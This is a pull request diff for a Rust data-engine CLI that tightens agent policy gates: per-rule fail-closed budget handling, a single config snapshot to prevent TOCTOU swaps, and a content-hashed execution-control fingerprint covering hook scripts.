### PR TITLE
fix(engine): waves 1–11 follow-ups — agent-policy hooks, gc oracle, remote-state integrity (#1089, #1090, #1095)

### DIFF
--- a/engine/crates/rocky-cli/src/api.rs
+++ b/engine/crates/rocky-cli/src/api.rs
@@ -931,9 +931,15 @@ pub(crate) fn sweep_interrupted_jobs(state_path: &std::path::Path) -> anyhow::Re
 /// table is deliberately **not** synced here. `serve` is long-running, so a
 /// per-job remote round-trip would be impractical, and a job launched on one
 /// pod is meaningless to another. `jobs` is therefore listed in
-/// [`rocky_core::state::LOCAL_ONLY_TABLE_NAMES`], so the periodic/end-of-run
-/// state upload strips it from the remote snapshot — this write stays
-/// node-local by design and is never reverted by another pod's run-download.
+/// [`rocky_core::state::LOCAL_ONLY_TABLE_NAMES`], which keeps it node-local on
+/// BOTH sync legs: the end-of-run/periodic upload strips it from the remote
+/// snapshot, and the run-start download (`state_sync::download_state`)
+/// explicitly PRESERVES the local-only tables across the wholesale file replace
+/// — snapshotting them before the download and splicing them back afterward.
+/// So this write stays node-local and is not reverted by another pod's
+/// run-download. (Merely being stripped on upload would NOT be enough on its
+/// own: without the download-side preservation, a run-download's wholesale file
+/// replace would still wipe the local `jobs` rows.)
 async fn persist_job(state_path: std::path::PathBuf, job: PersistedJob) -> anyhow::Result<()> {
     tokio::task::spawn_blocking(move || -> anyhow::Result<()> {
         let store = rocky_core::state::StateStore::open(&state_path)?;

--- a/engine/crates/rocky-cli/src/api.rs
+++ b/engine/crates/rocky-cli/src/api.rs
@@ -924,6 +924,16 @@ pub(crate) fn sweep_interrupted_jobs(state_path: &std::path::Path) -> anyhow::Re
 }
 
 /// Persist a job record (brief open-write-close on the blocking pool).
+///
+/// Remote `[state]` integrity (S1, #1089): unlike the governance ledgers
+/// (`policy_decisions`, `tombstones`) — whose non-run write seams bracket
+/// themselves with a download-before / upload-after remote sync — the `jobs`
+/// table is deliberately **not** synced here. `serve` is long-running, so a
+/// per-job remote round-trip would be impractical, and a job launched on one
+/// pod is meaningless to another. `jobs` is therefore listed in
+/// [`rocky_core::state::LOCAL_ONLY_TABLE_NAMES`], so the periodic/end-of-run
+/// state upload strips it from the remote snapshot — this write stays
+/// node-local by design and is never reverted by another pod's run-download.
 async fn persist_job(state_path: std::path::PathBuf, job: PersistedJob) -> anyhow::Result<()> {
     tokio::task::spawn_blocking(move || -> anyhow::Result<()> {
         let store = rocky_core::state::StateStore::open(&state_path)?;

--- a/engine/crates/rocky-cli/src/commands/apply.rs
+++ b/engine/crates/rocky-cli/src/commands/apply.rs
@@ -990,20 +990,6 @@ pub fn evaluate_apply_policy_with_policy(
         Err(gate) => return gate,
     };
 
-    // Finding 6: when the policy uses autonomy budgets or `verify_after`, the
-    // decision rows are durability-CRITICAL — the plain rule decision written here
-    // pairs with the later verify-after custody row to burn the budget
-    // (`policy::budget_failures_in_window` needs BOTH). A silently-dropped decision
-    // row (write-handle unavailable under advisory-lock contention, or a write
-    // error) means a failed apply never burns the budget and a later agent action
-    // auto-allows. For such policies the ledger open + write are FAIL-CLOSED. For
-    // ordinary policies (no budget / no verify_after) the write stays best-effort,
-    // so an audit-row hiccup never blocks an apply (no availability regression).
-    let budget_relevant = policy
-        .rules
-        .iter()
-        .any(|r| r.autonomy_budget.is_some() || !r.verify_after.is_empty());
-
     // Snapshot the decision ledger *before* this apply writes any rows, so the
     // dynamic breakers (autonomy-budget burn, active freezes) reflect only
     // prior history. The snapshot is taken through `open_read_only` FIRST:
@@ -1016,23 +1002,13 @@ pub fn evaluate_apply_policy_with_policy(
         .ok()
         .and_then(|reader| reader.list_policy_decisions().ok());
 
-    // Ledger write handle. For a budget-relevant policy the handle MUST be
-    // obtainable — retry briefly on transient advisory-lock contention, then fail
-    // closed (Deny) if still unavailable. Otherwise best-effort (a failed open
-    // just skips the audit write).
-    let ledger = if budget_relevant {
-        match open_ledger_with_retry(state_path) {
-            Ok(store) => Some(store),
-            Err(e) => {
-                return fail_closed_budget_gate(
-                    touched,
-                    &format!("the decision ledger could not be opened for writing ({e})"),
-                );
-            }
-        }
-    } else {
-        StateStore::open(state_path).ok()
-    };
+    // Ledger write handle, opened with a bounded retry on transient advisory-lock
+    // contention. Finding 6 (scoped, red-team round 6): budget / `verify_after`
+    // durability is enforced PER WINNING RULE in the record sink below — a dropped
+    // decision row for a rule that actually governs a touched target fails closed,
+    // while an ordinary audit-row hiccup never blocks the apply. So an UNRELATED
+    // budget rule for a different target no longer forces a false-deny.
+    let ledger = open_ledger_with_retry(state_path).ok();
 
     // Rare fallback: the read-only open lost a transient redb open race but a
     // write handle succeeded — snapshot through it rather than reading nothing.
@@ -1055,10 +1031,20 @@ pub fn evaluate_apply_policy_with_policy(
         &prior_decisions,
         snapshot_unreadable,
         |record| {
+            // Durability is critical only when THIS record's WINNING rule uses an
+            // autonomy budget or `verify_after` — its decision row pairs with a
+            // later custody row to burn the budget. A rule that did not win for any
+            // touched target produces no record here, so an unrelated budget rule
+            // never forces fail-closed handling (fixes the round-6 false-deny).
+            let rec_budget_relevant = record
+                .rule_id
+                .and_then(|idx| policy.rules.get(idx))
+                .map(|r| r.autonomy_budget.is_some() || !r.verify_after.is_empty())
+                .unwrap_or(false);
             match &ledger {
                 Some(store) => {
                     if let Err(e) = store.record_policy_decision(record) {
-                        if budget_relevant {
+                        if rec_budget_relevant {
                             budget_write_failed.set(true);
                             warn!(
                                 target: "rocky::policy",
@@ -1074,15 +1060,15 @@ pub fn evaluate_apply_policy_with_policy(
                         }
                     }
                 }
-                // A budget-relevant policy with no write handle is impossible here
-                // (we fail closed above), but guard defensively.
-                None if budget_relevant => budget_write_failed.set(true),
+                // No write handle: fail closed only if this winning rule is
+                // itself budget / verify_after-relevant.
+                None if rec_budget_relevant => budget_write_failed.set(true),
                 None => {}
             }
         },
     );
 
-    if budget_relevant && budget_write_failed.get() {
+    if budget_write_failed.get() {
         return fail_closed_budget_gate(
             touched,
             "a budget-relevant decision row could not be persisted",
@@ -1096,16 +1082,27 @@ pub fn evaluate_apply_policy_with_policy(
 /// Mirrors the download-publish lock retry. Fail-closed: propagates the last
 /// error after the retries are exhausted.
 fn open_ledger_with_retry(state_path: &Path) -> Result<StateStore, rocky_core::state::StateError> {
+    use rocky_core::state::StateError;
     const MAX_ATTEMPTS: u32 = 5;
-    let mut last: Option<rocky_core::state::StateError> = None;
+    let mut last: Option<StateError> = None;
     for attempt in 1..=MAX_ATTEMPTS {
         match StateStore::open(state_path) {
             Ok(store) => return Ok(store),
             Err(e) => {
+                // Only retry TRANSIENT advisory-lock contention (a concurrent
+                // writer briefly holding the lock). A permanent error (schema
+                // mismatch, version parse, lock I/O, a corrupt file, …) is returned
+                // immediately — retrying it merely delays the correct failure
+                // (red-team round 6).
+                let transient = matches!(
+                    e,
+                    StateError::LockHeldByOther { .. } | StateError::Busy { .. }
+                );
                 last = Some(e);
-                if attempt < MAX_ATTEMPTS {
-                    std::thread::sleep(std::time::Duration::from_millis(20 * u64::from(attempt)));
+                if !transient || attempt == MAX_ATTEMPTS {
+                    break;
                 }
+                std::thread::sleep(std::time::Duration::from_millis(20 * u64::from(attempt)));
             }
         }
     }

--- a/engine/crates/rocky-cli/src/commands/apply.rs
+++ b/engine/crates/rocky-cli/src/commands/apply.rs
@@ -269,7 +269,12 @@ async fn run_apply_run_plan(
 
     // Resolve the post-apply verification checks *before* the run plan is moved
     // into execution (the run plan owns the models_dir the resolver reads).
-    let verify_checks = required_verify_after(config_path, principal, &touched, models_dir);
+    let verify_checks = required_verify_after(
+        cfg.as_ref().and_then(|c| c.policy.as_ref()),
+        principal,
+        &touched,
+        models_dir,
+    );
 
     // Finding 3 (pre-run half): the plain rule decision the gate just recorded
     // must survive `run`'s start-download, which REPLACES the local ledger from
@@ -972,7 +977,7 @@ pub fn evaluate_apply_policy(
 /// remote-state sync decision AND this evaluation, so a config that gains a
 /// `[policy]` block between the two can't make the guard skip the sync while this
 /// gate then reads stale local decisions (finding A).
-pub(crate) fn evaluate_apply_policy_with_policy(
+pub fn evaluate_apply_policy_with_policy(
     policy: Option<&rocky_core::config::PolicyConfig>,
     plan_id: &str,
     principal: PolicyPrincipal,
@@ -1044,14 +1049,17 @@ pub(crate) fn evaluate_apply_policy_with_policy(
 /// and the decision-row writes both go through the caller's already-open
 /// `ledger`, never a fresh open.
 pub(crate) fn evaluate_apply_policy_with_store(
-    config_path: &Path,
+    policy: Option<&rocky_core::config::PolicyConfig>,
     plan_id: &str,
     principal: PolicyPrincipal,
     touched: &BTreeMap<String, PolicyCapability>,
     models_dir: &Path,
     ledger: &StateStore,
 ) -> PolicyGate {
-    let (policy, attrs_map) = match load_policy_and_attrs(config_path, touched, models_dir) {
+    // Finding 1: takes the SAME `[policy]` snapshot `run` already holds (its L1212
+    // `rocky_cfg`), not a reload — the in-run replication gate must evaluate the
+    // config `run` executed against, not one a mid-run `rocky.toml` swap points at.
+    let (policy, attrs_map) = match resolve_policy_and_attrs(policy, touched, models_dir) {
         Ok(pair) => pair,
         Err(gate) => return gate,
     };
@@ -1080,31 +1088,6 @@ pub(crate) fn evaluate_apply_policy_with_store(
             }
         },
     )
-}
-
-/// Load the `[policy]` block from `config_path` and compile the per-model
-/// attributes, or return an early [`PolicyGate`]. A thin wrapper over
-/// [`resolve_policy_and_attrs`] for callers that reach the gate through a
-/// config path rather than a held config snapshot (e.g.
-/// [`evaluate_apply_policy_with_store`]).
-fn load_policy_and_attrs(
-    config_path: &Path,
-    touched: &BTreeMap<String, PolicyCapability>,
-    models_dir: &Path,
-) -> std::result::Result<
-    (
-        rocky_core::config::PolicyConfig,
-        BTreeMap<String, ModelAttributes>,
-    ),
-    PolicyGate,
-> {
-    // A missing or malformed config leaves the policy plane unconfigured — the
-    // caller keeps its pre-policy-plane gate. (The run path re-loads and surfaces
-    // any real config error itself.)
-    let policy = rocky_core::config::load_rocky_config(config_path)
-        .ok()
-        .and_then(|cfg| cfg.policy);
-    resolve_policy_and_attrs(policy.as_ref(), touched, models_dir)
 }
 
 /// Given an ALREADY-RESOLVED `[policy]` block, compile the per-model attributes,
@@ -1241,35 +1224,6 @@ fn evaluate_apply_policy_core(
     }
 
     worst.unwrap_or(PolicyGate::Allow)
-}
-
-/// Fail-closed config probe for apply seams whose execution path does not
-/// itself require a loadable config (gc, backfill).
-///
-/// [`evaluate_apply_policy`] maps *any* config-load error to
-/// [`PolicyGate::NotConfigured`] — correct for the run path, which re-loads
-/// and surfaces the error itself before mutating anything. The gc and
-/// backfill applies have no such backstop: a malformed `rocky.toml` (which
-/// may carry the very `[policy]` block with the deny/freeze rules) would
-/// silently unenforce the policy plane while the apply still executes. This
-/// probe bails on a load **error** while keeping a genuinely-missing config
-/// file permitted (no file ⇒ no `[policy]` block to enforce ⇒ the
-/// NotConfigured posture is honest).
-pub(crate) fn bail_on_config_load_error(
-    config_path: &Path,
-    plan_kind: &str,
-    plan_id: &str,
-) -> Result<()> {
-    match rocky_core::config::load_rocky_config(config_path) {
-        Ok(_) => Ok(()),
-        Err(rocky_core::config::ConfigError::FileNotFound { .. }) => Ok(()),
-        Err(e) => Err(anyhow::Error::new(e).context(format!(
-            "refusing to apply {plan_kind} plan '{plan_id}': {} failed to load, so any \
-             configured [policy] rules cannot be enforced (fail-closed). Fix the config and \
-             re-run `rocky apply {plan_id}`.",
-            config_path.display()
-        ))),
-    }
 }
 
 /// Restrictiveness rank for aggregating per-model [`PolicyGate`]s.
@@ -1861,10 +1815,15 @@ impl GovernedRunContext<'_> {
     /// and records through it rather than re-opening (which would collide
     /// in-process and spuriously mark the snapshot unreadable → a bogus
     /// fail-closed deny for every agent replication).
+    /// `cfg` is the SAME immutable snapshot `run` loaded once (its L1212
+    /// `rocky_cfg`); the gate evaluates `[policy]` and resolves the models-dir
+    /// from it rather than reloading `rocky.toml`, so a mid-run swap can't change
+    /// the plane this gate enforces (finding 1).
     pub(crate) fn gate_replication_targets(
         &self,
         target_names: &BTreeSet<String>,
         ledger: &StateStore,
+        cfg: &rocky_core::config::RockyConfig,
     ) -> Result<()> {
         if target_names.is_empty() {
             return Ok(());
@@ -1878,9 +1837,9 @@ impl GovernedRunContext<'_> {
         // No compiled model dir for replication targets — evaluate against
         // bare-named attributes (a nonexistent dir yields an empty attr map, so
         // every target matches by name / the default posture).
-        let models_dir = resolve_config_models_dir(self.config_path);
+        let models_dir = resolve_config_models_dir(self.config_path, Some(cfg));
         let gate = evaluate_apply_policy_with_store(
-            self.config_path,
+            cfg.policy.as_ref(),
             self.plan_id,
             self.principal,
             &touched,
@@ -1912,7 +1871,7 @@ pub(crate) fn gate_promote_plan(
     // ONE config snapshot for the pre-gate sync decision AND the policy gate
     // (finding A — config-snapshot TOCTOU).
     let cfg = rocky_core::config::load_rocky_config(config_path).ok();
-    let promote_models_dir = resolve_config_models_dir(config_path);
+    let promote_models_dir = resolve_config_models_dir(config_path, cfg.as_ref());
     let touched = touched_models_for_promote(promote_plan, &promote_models_dir);
     // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
     // the gate reads it, so a cross-pod freeze is enforced. Placed inside the
@@ -1933,21 +1892,25 @@ pub(crate) fn gate_promote_plan(
     apply_policy_gate(root, plan_id, gate)
 }
 
-/// Resolve the models directory for the promote gate from the loaded config:
-/// the first transformation pipeline's `models` glob base (everything before
-/// the first wildcard), relative to the config file's parent. Falls back to
-/// `<project>/models` when the config does not load or declares no
+/// Resolve the models directory for the promote gate from an ALREADY-LOADED
+/// config snapshot: the first transformation pipeline's `models` glob base
+/// (everything before the first wildcard), relative to `config_path`'s parent.
+/// Falls back to `<project>/models` when the snapshot is `None` or declares no
 /// transformation pipeline. Mirrors the backfill/gc resolution.
-fn resolve_config_models_dir(config_path: &Path) -> std::path::PathBuf {
+///
+/// Finding 1: takes the snapshot rather than reloading `rocky.toml`, so a
+/// governed path resolves the models dir from the SAME config it gates on.
+fn resolve_config_models_dir(
+    config_path: &Path,
+    cfg: Option<&rocky_core::config::RockyConfig>,
+) -> std::path::PathBuf {
     let project_root = config_path.parent().unwrap_or(Path::new(""));
-    let glob = rocky_core::config::load_rocky_config(config_path)
-        .ok()
-        .and_then(|cfg| {
-            cfg.pipelines.values().find_map(|p| match p {
-                rocky_core::config::PipelineConfig::Transformation(t) => Some(t.models.clone()),
-                _ => None,
-            })
-        });
+    let glob = cfg.and_then(|cfg| {
+        cfg.pipelines.values().find_map(|p| match p {
+            rocky_core::config::PipelineConfig::Transformation(t) => Some(t.models.clone()),
+            _ => None,
+        })
+    });
     let base = glob
         .as_deref()
         .and_then(|g| g.split(&['*', '?', '['][..]).next())
@@ -2026,15 +1989,15 @@ fn apply_policy_gate(root: &Path, plan_id: &str, gate: PolicyGate) -> Result<()>
 /// empty when no `[policy]` block is configured or no matched rule carries a
 /// `verify_after` (the common case — no post-apply gate).
 fn required_verify_after(
-    config_path: &Path,
+    policy: Option<&rocky_core::config::PolicyConfig>,
     principal: PolicyPrincipal,
     touched: &BTreeMap<String, PolicyCapability>,
     models_dir: &Path,
 ) -> Vec<String> {
-    let Ok(cfg) = rocky_core::config::load_rocky_config(config_path) else {
-        return Vec::new();
-    };
-    let Some(policy) = cfg.policy else {
+    // Finding 1: takes the SAME `[policy]` snapshot the gate used, rather than
+    // reloading `rocky.toml` — a swap between the gate and this resolution could
+    // otherwise change the `verify_after` set the governed apply enforces.
+    let Some(policy) = policy else {
         return Vec::new();
     };
     let attrs_map = model_attributes(models_dir);
@@ -2051,7 +2014,7 @@ fn required_verify_after(
                 &owned
             }
         };
-        let decision = policy::evaluate(&policy, principal, *capability, attrs);
+        let decision = policy::evaluate(policy, principal, *capability, attrs);
         if decision.effect == PolicyEffect::Deny {
             continue;
         }
@@ -2294,7 +2257,12 @@ async fn run_apply_ai_authored_plan(
     }
 
     // Resolve the post-apply verification checks before the run plan is moved.
-    let verify_checks = required_verify_after(config_path, principal, &touched, models_dir);
+    let verify_checks = required_verify_after(
+        cfg.as_ref().and_then(|c| c.policy.as_ref()),
+        principal,
+        &touched,
+        models_dir,
+    );
 
     // Finding 3 (pre-run half): make the plain rule decision durable on remote
     // before `run`'s start-download replaces the local ledger — see the twin in
@@ -2392,13 +2360,26 @@ async fn run_apply_backfill_plan(
 
     // Policy can only tighten the gate: a `deny` hard-refuses even a reviewed
     // backfill. The marker above already satisfies any policy `require_review`.
-    // Fail-closed pre-check: the backfill execution path does not itself need the
-    // config to have loaded, so a config-load ERROR must bail here rather than
-    // silently unenforcing a possibly-configured `[policy]` block.
-    bail_on_config_load_error(config_path, "backfill", plan_id)?;
-    // ONE config snapshot for the pre-gate sync decision AND the policy gate, so
-    // the guard and gate can't disagree about `[policy]` presence (finding A).
-    let cfg = rocky_core::config::load_rocky_config(config_path).ok();
+    //
+    // Finding 1: ONE config snapshot for the entire backfill apply — the sync
+    // decision, the policy gate, the execute-from-owned routing verification, and
+    // `execute_backfill_set` all read THIS instance, so a `rocky.toml` swap can't
+    // point any of them at a different config. Fail-closed pre-check folded in: a
+    // config-load ERROR bails here (the execution path doesn't itself need the
+    // config, so an unenforced `[policy]` must fail loud); a genuinely absent
+    // config keeps the NotConfigured posture.
+    let cfg = match rocky_core::config::load_rocky_config(config_path) {
+        Ok(c) => Some(c),
+        Err(rocky_core::config::ConfigError::FileNotFound { .. }) => None,
+        Err(e) => {
+            return Err(anyhow::Error::new(e).context(format!(
+                "refusing to apply backfill plan '{plan_id}': {} failed to load, so any \
+                 configured [policy] rules cannot be enforced (fail-closed). Fix the config and \
+                 re-run `rocky apply {plan_id}`.",
+                config_path.display()
+            )));
+        }
+    };
     let models_dir = Path::new(run_plan.models_dir.as_deref().unwrap_or("models"));
     // A backfill's `models` list IS the authoritative rebuild closure the
     // engine composed and will execute (see `execute_backfill_set` below), not
@@ -2468,7 +2449,6 @@ async fn run_apply_backfill_plan(
 
     // Governed-apply TOCTOU gate (E) for the backfill path — an agent backfill
     // apply refuses if the compiled IR / config changed since the plan.
-    let backfill_cfg = rocky_core::config::load_rocky_config(config_path).ok();
     let governed = governed_run_context(
         &plan,
         plan.enforcement_principal(runtime_principal),
@@ -2483,7 +2463,9 @@ async fn run_apply_backfill_plan(
     // ‼️ Finding #2: a backfill ALWAYS executes models (its `model_set`) —
     // preflight the reviewed source-schema snapshot before any warehouse mutation.
     preflight_snapshot(governed.as_ref(), plan_id, true)?;
-    let exec_fp_gate = match (governed.as_ref(), backfill_cfg.as_ref()) {
+    // Finding 1: the routing verification below runs against the SAME `cfg`
+    // snapshot the gate/sync used — not a fresh `backfill_cfg` reload.
+    let exec_fp_gate = match (governed.as_ref(), cfg.as_ref()) {
         (Some(ctx), Some(cfg)) => {
             // Fail-closed (#4/#5): verify the routing identity before executing.
             ctx.verify_routing_identity(cfg)?;
@@ -2502,13 +2484,11 @@ async fn run_apply_backfill_plan(
         _ => None,
     };
 
-    // Execute-from-owned (finding B): hand the SAME verified `backfill_cfg`
-    // instance `verify_routing_identity` checked to `execute_backfill_set`,
-    // rather than have it reload — a timed `rocky.toml` swap between the gate and
-    // a reload would otherwise pick a different, unverified destination. A config
-    // that will not load cannot be executed against; bail (mirrors the old
-    // internal load error).
-    let rocky_cfg = backfill_cfg.with_context(|| {
+    // Execute-from-owned (finding B): hand the SAME verified `cfg` instance
+    // `verify_routing_identity` checked to `execute_backfill_set`, rather than a
+    // reload a timed `rocky.toml` swap could redirect. A config that will not load
+    // cannot be executed against; bail.
+    let rocky_cfg = cfg.with_context(|| {
         format!(
             "failed to load config from {} (required for backfill)",
             config_path.display()
@@ -3673,47 +3653,6 @@ effect = "deny"
         Ok(())
     }
 
-    /// 🔴 FIX 6 regression: a config-load ERROR must fail closed at the
-    /// gc/backfill apply seams. `evaluate_apply_policy` maps any load error to
-    /// `NotConfigured` (correct only for the run path, which re-surfaces the
-    /// error itself); the gc/backfill applies execute without needing the
-    /// config, so a malformed `rocky.toml` — which may carry the very
-    /// `[policy]` deny/freeze rules — would silently unenforce them.
-    #[test]
-    fn config_load_error_bails_fail_closed() -> anyhow::Result<()> {
-        let dir = tempfile::tempdir()?;
-        // Malformed TOML → a load ERROR (not FileNotFound).
-        let bad = dir.path().join("rocky.toml");
-        std::fs::write(&bad, "this is = = not valid toml [[[")?;
-        let err = super::bail_on_config_load_error(&bad, "backfill", "plan_x").unwrap_err();
-        assert!(
-            err.to_string().contains("cannot be enforced"),
-            "a malformed config must fail closed: {err}"
-        );
-        Ok(())
-    }
-
-    /// A genuinely-missing config file is NOT an error — no file means no
-    /// `[policy]` block to enforce, so the NotConfigured posture is honest.
-    #[test]
-    fn missing_config_is_permitted_at_gc_backfill_seams() {
-        let dir = tempfile::tempdir().unwrap();
-        let missing = dir.path().join("does-not-exist.toml");
-        assert!(super::bail_on_config_load_error(&missing, "gc", "plan_x").is_ok());
-    }
-
-    /// A well-formed config (with or without `[policy]`) loads cleanly → no bail.
-    #[test]
-    fn valid_config_passes_the_fail_closed_probe() -> anyhow::Result<()> {
-        let dir = tempfile::tempdir()?;
-        std::fs::write(dir.path().join("rocky.toml"), NO_POLICY_TOML)?;
-        assert!(
-            super::bail_on_config_load_error(&dir.path().join("rocky.toml"), "gc", "plan_x")
-                .is_ok()
-        );
-        Ok(())
-    }
-
     #[test]
     fn evaluate_apply_policy_not_configured_without_block() -> anyhow::Result<()> {
         let dir = tempfile::tempdir()?;
@@ -4459,13 +4398,14 @@ auto_create_schemas = true
 "#,
         )
         .unwrap();
+        let loaded = rocky_core::config::load_rocky_config(&config).ok();
         assert_eq!(
-            super::resolve_config_models_dir(&config),
+            super::resolve_config_models_dir(&config, loaded.as_ref()),
             dir.path().join("custom_models")
         );
-        // Missing config → fallback to <project>/models.
+        // Missing config (None snapshot) → fallback to <project>/models.
         assert_eq!(
-            super::resolve_config_models_dir(&dir.path().join("missing.toml")),
+            super::resolve_config_models_dir(&dir.path().join("missing.toml"), None),
             dir.path().join("models")
         );
     }
@@ -4972,14 +4912,15 @@ effect = "deny"
             reviewed_source_schemas: None,
             expects_models: true,
         };
+        let loaded_cfg = rocky_core::config::load_rocky_config(&config)?;
         let targets: BTreeSet<String> = ["raw_orders".to_string()].into_iter().collect();
         let err = ctx
-            .gate_replication_targets(&targets, &ledger)
+            .gate_replication_targets(&targets, &ledger, &loaded_cfg)
             .expect_err("an agent replication under a deny rule must be refused");
         assert!(err.to_string().contains("DENIES"), "got: {err}");
 
         // An empty target set is a no-op (nothing executes).
-        ctx.gate_replication_targets(&BTreeSet::new(), &ledger)
+        ctx.gate_replication_targets(&BTreeSet::new(), &ledger, &loaded_cfg)
             .expect("no targets ⇒ nothing to gate");
         Ok(())
     }
@@ -5019,13 +4960,15 @@ effect = "allow"
             reviewed_source_schemas: None,
             expects_models: true,
         };
+        let loaded_cfg = rocky_core::config::load_rocky_config(&config)?;
         let targets: BTreeSet<String> = ["raw_orders".to_string()].into_iter().collect();
 
         // Through the held handle → reads fine → allow (no spurious deny).
-        ctx.gate_replication_targets(&targets, &held).expect(
-            "the replication gate must read through the held handle and not spuriously deny \
-             under an `allow` rule",
-        );
+        ctx.gate_replication_targets(&targets, &held, &loaded_cfg)
+            .expect(
+                "the replication gate must read through the held handle and not spuriously deny \
+                 under an `allow` rule",
+            );
 
         // Contrast: the re-open path (evaluate_apply_policy via state_path)
         // DOES fail closed while the handle is held — which is exactly why the
@@ -5068,8 +5011,10 @@ effect = "allow"
             reviewed_source_schemas: None,
             expects_models: true,
         };
+        let loaded_cfg =
+            rocky_core::config::load_rocky_config(&dir.path().join("rocky.toml")).unwrap();
         let targets: BTreeSet<String> = ["raw_orders".to_string()].into_iter().collect();
-        ctx.gate_replication_targets(&targets, &ledger)
+        ctx.gate_replication_targets(&targets, &ledger, &loaded_cfg)
             .expect("no [policy] block ⇒ replication gate is a no-op");
         Ok(())
     }

--- a/engine/crates/rocky-cli/src/commands/apply.rs
+++ b/engine/crates/rocky-cli/src/commands/apply.rs
@@ -1174,6 +1174,7 @@ pub(crate) fn execution_ir_fingerprint(
     models: &[rocky_core::models::Model],
     config_identity: &str,
     governance_identity: &str,
+    exec_control_identity: &str,
     extras: &ExecutionExtras,
 ) -> Option<String> {
     let mut projection: BTreeMap<String, serde_json::Value> = BTreeMap::new();
@@ -1198,6 +1199,12 @@ pub(crate) fn execution_ir_fingerprint(
     hasher.update(config_identity.as_bytes());
     hasher.update(b"\x00gov\x00");
     hasher.update(governance_identity.as_bytes());
+    // Execution-control identity (#1095): `[run]`/`[reuse]`/`[resilience]` and
+    // the content-addressed `[hook]` set. Hashed in (never compared raw) so a
+    // post-plan edit to what executes or which shell command fires refuses at
+    // the choke-point.
+    hasher.update(b"\x00exec\x00");
+    hasher.update(exec_control_identity.as_bytes());
     hasher.update(b"\x00extras\x00");
     hasher.update(&extras_bytes);
     Some(hasher.finalize().to_hex().to_string())
@@ -1393,6 +1400,106 @@ pub(crate) fn governance_policy_identity(cfg: &rocky_core::config::RockyConfig) 
     .unwrap_or_default()
 }
 
+/// The env-resolved **execution-control** identity (#1095): the on-disk `[run]`,
+/// `[reuse]`, `[resilience]`, and `[hook]`/`[hook.webhooks]` config that governs
+/// WHAT executes and WHICH side-effecting commands fire — none of which the
+/// compiled-IR projection or the routing/governance identities capture. Folded
+/// into the execution fingerprint (hashed, never compared raw — so a
+/// `[hook].env` value is never exposed) so a post-plan edit to a skip/reuse/retry
+/// toggle or a governed hook refuses at the execution choke-point.
+///
+/// Shell hooks are **content-addressed**: binding only the command STRING would
+/// miss an edit to `scripts/notify.sh`'s bytes, so the first whitespace token of
+/// each command that resolves to a file under `config_dir` (or an absolute path)
+/// is blake3-hashed (an unreadable file yields a stable sentinel — fail-closed),
+/// mirroring the contract-content idiom in [`ExecutionExtras`]. Computed
+/// identically at plan time and at the apply choke-point over the SAME
+/// `config_dir`, so an unchanged project is byte-stable and never false-refuses.
+pub(crate) fn execution_control_identity(
+    cfg: &rocky_core::config::RockyConfig,
+    config_dir: &Path,
+) -> String {
+    // Sorted by event key (BTreeMap); list order preserves the parsed `[[hook]]`
+    // sequence. Each hook binds its command, delivery config, AND a content hash
+    // of any referenced local script.
+    let hooks: BTreeMap<String, serde_json::Value> = cfg
+        .hooks
+        .hooks
+        .iter()
+        .map(|(event, hook_or_list)| {
+            let entries: Vec<serde_json::Value> = hook_config_list(hook_or_list)
+                .into_iter()
+                .map(|h| {
+                    serde_json::json!({
+                        "command": h.command,
+                        "timeout_ms": h.timeout_ms,
+                        "on_failure": serde_json::to_value(&h.on_failure)
+                            .unwrap_or(serde_json::Value::Null),
+                        "env": serde_json::to_value(&h.env).unwrap_or(serde_json::Value::Null),
+                        "script": hook_script_content_hash(&h.command, config_dir),
+                    })
+                })
+                .collect();
+            (event.clone(), serde_json::Value::Array(entries))
+        })
+        .collect();
+    let webhooks: BTreeMap<String, serde_json::Value> = cfg
+        .hooks
+        .webhooks
+        .iter()
+        .map(|(event, wh)| {
+            (
+                event.clone(),
+                serde_json::to_value(wh).unwrap_or(serde_json::Value::Null),
+            )
+        })
+        .collect();
+    serde_json::to_value(serde_json::json!({
+        "run": serde_json::to_value(&cfg.run).unwrap_or(serde_json::Value::Null),
+        "reuse": serde_json::to_value(&cfg.reuse).unwrap_or(serde_json::Value::Null),
+        "resilience": serde_json::to_value(&cfg.resilience).unwrap_or(serde_json::Value::Null),
+        "hooks": hooks,
+        "webhooks": webhooks,
+    }))
+    .map(|v| v.to_string())
+    .unwrap_or_default()
+}
+
+/// Flatten a `[hook]` event entry (single or `[[hook]]` list) to its configs.
+fn hook_config_list(
+    hook_or_list: &rocky_core::hooks::HookConfigOrList,
+) -> Vec<&rocky_core::hooks::HookConfig> {
+    match hook_or_list {
+        rocky_core::hooks::HookConfigOrList::Single(c) => vec![c],
+        rocky_core::hooks::HookConfigOrList::Multiple(v) => v.iter().collect(),
+    }
+}
+
+/// Content-address a shell hook: hash the bytes of the first command token that
+/// resolves to an existing file (relative to `config_dir` or absolute). Returns
+/// `{path, blake3}` for a resolvable script (an unreadable file → a stable
+/// sentinel, fail-closed) or `null` when the command references no local file
+/// (its command string is still bound by [`execution_control_identity`]). So an
+/// edit to a referenced script's CONTENTS — not just its command string — moves
+/// the identity and refuses a governed apply.
+fn hook_script_content_hash(command: &str, config_dir: &Path) -> serde_json::Value {
+    for token in command.split_whitespace() {
+        let candidate = if Path::new(token).is_absolute() {
+            std::path::PathBuf::from(token)
+        } else {
+            config_dir.join(token)
+        };
+        if candidate.is_file() {
+            let blake3 = match std::fs::read(&candidate) {
+                Ok(bytes) => blake3::hash(&bytes).to_hex().to_string(),
+                Err(_) => "<unreadable-hook-script>".to_string(),
+            };
+            return serde_json::json!({ "path": token, "blake3": blake3 });
+        }
+    }
+    serde_json::Value::Null
+}
+
 /// The TOCTOU check threaded to the single execution choke-point
 /// ([`commands::run::execute_models`]). Carries the plan-authorized IR
 /// fingerprint plus the execute-time config identity so the choke-point can
@@ -1409,6 +1516,10 @@ pub struct ExecFingerprintGate {
     /// The model-independent governance identity computed from the execute-time
     /// config (roles / cache-selection).
     pub governance_identity: String,
+    /// The execute-time execution-control identity (#1095): `[run]`/`[reuse]`/
+    /// `[resilience]` + the content-addressed `[hook]` set. Carried here (like
+    /// `resolved_mask`) because `execute_models` has no `cfg`/`config_dir`.
+    pub exec_control_identity: String,
     /// The env-resolved mask map (`resolve_mask_for_env(plan-env)`). The
     /// choke-point restricts it to the executed models' classification tags when
     /// building [`ExecutionExtras`] (finding C — an unused mask entry must not
@@ -1456,6 +1567,7 @@ impl ExecFingerprintGate {
             models,
             &self.config_identity,
             &self.governance_identity,
+            &self.exec_control_identity,
             extras,
         );
         if actual.as_deref() != Some(expected) {
@@ -1541,6 +1653,10 @@ impl GovernedRunContext<'_> {
